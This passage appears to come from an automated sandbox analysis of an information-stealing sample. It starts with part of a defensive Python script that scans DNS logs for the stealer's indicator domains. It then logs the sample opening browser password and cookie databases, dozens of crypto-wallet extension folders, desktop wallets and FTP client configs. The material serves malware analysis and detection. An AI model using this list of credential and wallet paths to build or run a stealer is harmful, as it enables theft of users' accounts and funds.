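        ioc = matching_ioc(qname, iocs)
        if ioc:
            hits.append((n, client, normalize(qname), ioc))
    return hits


# Constructed log lines (not from the sandbox's pcap). Line 4 is a lookalike that
# must not match; line 3 is a subdomain with mixed case and must match.
SAMPLE_LOG = [
    "2024-12-27T10:12:03Z 10.0.0.5 A rapeflowwj.lat.",
    "2024-12-27T10:12:04Z 10.0.0.5 A www.example.com",
    "2024-12-27T10:12:09Z 10.0.0.7 A CDN.Grannyejh.LAT",
    "2024-12-27T10:12:11Z 10.0.0.9 AAAA notrapeflowwj.lat",
]

if __name__ == "__main__":
    for n, client, qname, ioc in scan_dns_log(SAMPLE_LOG):
        print(f"line {n}: {client} queried {qname} (indicator {ioc})")
```

Feed it real DNS client or resolver logs by adapting `scan_dns_log`'s field split to the source format; the label-wise comparison in `matching_ioc` is the part worth keeping, because suffix matching on a stealer's short, random-looking domains produces both false positives and, for subdomains, false negatives.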

Stealing of Sensitive Information

Source: Yara match :: File source: sslproxydump.pcap, type: PCAP
Source: Yara match :: File source: Process Memory Space: SPFFah2O2q.exe PID: 768, type: MEMORYSTR
Source: Yara match :: File source: decrypted.memstr, type: MEMORYSTR
Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: Wallets/Electrum-LTC
Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: Wallets/ElectronCash
Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: %appdata%\com.liberty.jaxx\IndexedDB
Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: window-state.json
Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: %appdata%\Exodus\exodus.wallet
Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: Wallets/Exodus
Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000540000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: %appdata%\Ethereum
Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: SPFFah2O2q.exe, 00000000.00000002.1720458759.0000000000579000.00000004.00000020.00020000.00000000.sdmp :: String found in binary or memory: keystore
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.db
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.db
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\SPFFah2O2q.exe :: File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\BJZFPPWAPTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\PWCCAWLGREJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXAJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
            Source: C:\Users\user\Desktop\SPFFah2O2q.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFLJump to behavior
